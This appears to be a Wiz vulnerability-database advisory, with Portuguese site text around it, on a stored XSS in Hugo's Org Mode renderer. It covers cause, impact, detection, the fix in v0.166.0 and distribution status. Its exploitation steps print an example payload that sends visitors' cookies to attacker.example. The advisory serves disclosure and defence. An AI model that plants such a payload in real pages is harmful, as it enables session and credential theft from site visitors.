
PEACH
Uma estrutura de isolamento de inquilino
CVE-2026-100694 is a stored Cross-Site Scripting (XSS) vulnerability in the Hugo static site generator affecting versions v0.56.0 through v0.165.x. Hugo fails to escape raw HTML in content files mapped to the text/org media type — Org export blocks and @@html:...@@ snippets are rendered unescaped, allowing injected scripts to execute in visitor browsers. The vulnerability was disclosed on September 26, 2026, and a patch was released in v0.166.0. It carries a CVSS v3.1 base score of 6.1 (Medium) and a CVSS v4.0 base score of 5.1 (Medium) (GitHub Advisory, Hugo Advisory).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), where Hugo's Org Mode renderer passes raw HTML from Org export blocks (#+BEGIN_EXPORT html ... #+END_EXPORT) and inline @@html:...@@ snippets directly into generated HTML output without sanitization or escaping. An attacker who can write to or influence content files under /content, or control the output of a content adapter that produces text/org-typed content, can embed arbitrary JavaScript. The attack requires no authentication or special privileges on the Hugo build system — only the ability to supply or modify a content file — and requires a victim to visit the affected generated page in a browser (GitHub Advisory, Hugo Advisory).
Successful exploitation allows an attacker to inject and execute arbitrary JavaScript in the browsers of visitors to affected Hugo-generated pages, enabling session hijacking, credential theft, phishing, or malicious redirects. The impact is scoped to the subsequent system (visitor browsers) rather than the Hugo build server itself, with low confidentiality and integrity impact on visitor sessions. Sites that fully trust all content sources are not impacted, and only pages sourced from text/org media type files are affected (GitHub Advisory, Red Hat Bugzilla).
There is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation as of the time of disclosure (GitHub Advisory). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.188%, placing it in the 8th percentile for exploitation likelihood. Exploitation is not automatable, as it requires user interaction (a visitor must load the affected page) and the attacker must have write access to content files or content adapters (GitHub Advisory).
/content directory, or influence the output of a content adapter that produces text/org-typed content (e.g., via a pull request, CMS access, or compromised contributor account)..org content file that includes a raw HTML export block or inline snippet containing a malicious script, for example:#+BEGIN_EXPORT html
<script>document.location='https://attacker.example/steal?c='+document.cookie</script>
#+END_EXPORTor using the inline form: @@html:<script>alert(1)</script>@@
3. Trigger a Hugo build: The malicious content file is processed during the next Hugo site build, embedding the unescaped script tag directly into the generated HTML output page.
4. Deliver to victims: The generated static site is deployed. When a visitor navigates to the affected page in their browser, the injected script executes in their browser context, enabling session theft, credential harvesting, or further attacks (Hugo Advisory, GitHub Advisory).
.org files under the Hugo /content directory containing #+BEGIN_EXPORT html, #+END_EXPORT, or @@html:...@@ blocks with <script> tags, event handlers (e.g., onerror, onload), or external resource references.public/ output directory containing inline <script> tags or JavaScript URIs not present in trusted templates or shortcodes..org content files, particularly from unfamiliar contributors or automated accounts..org-sourced pages.Upgrade Hugo to v0.166.0 or later, which introduces a security.allowContent allowlist that denies text/org by default, preventing unescaped HTML rendering. Sites that intentionally use Org Mode content can opt back in after upgrading by adding [security] allowContent = ['.*'] to their Hugo configuration. As an interim workaround prior to upgrading, restrict write access to the /content directory and content adapters to fully trusted contributors only, and audit existing .org files for malicious HTML export blocks (Hugo Advisory, GitHub Advisory).
The vulnerability was credited to researcher philipdissert as the finder, per the Hugo security advisory. Red Hat tracked the issue via Bugzilla (Bug 2541804) and assigned it medium severity. No significant broader media coverage or notable social media commentary has been identified beyond standard CVE aggregator coverage (Hugo Advisory, Red Hat Bugzilla).
Disponibilidade de correção em distribuições Linux principais e suas versões.
bionic (esm-apps)
hugo
devel
hugo
focal (esm-apps)
hugo
jammy
hugo
jammy (esm-apps)
hugo
noble
hugo
noble (esm-apps)
hugo
resolute
hugo
Origem: Este relatório foi gerado usando IA
Avaliação de vulnerabilidade gratuita
Avalie suas práticas de segurança na nuvem em 9 domínios de segurança para comparar seu nível de risco e identificar lacunas em suas defesas.
Marque uma demonstração personalizada
"A melhor experiência do usuário que eu já vi, fornece visibilidade total para cargas de trabalho na nuvem."
"A Wiz fornece um único painel de vidro para ver o que está acontecendo em nossos ambientes de nuvem."
"Sabemos que se a Wiz identifica algo como crítico, na verdade é."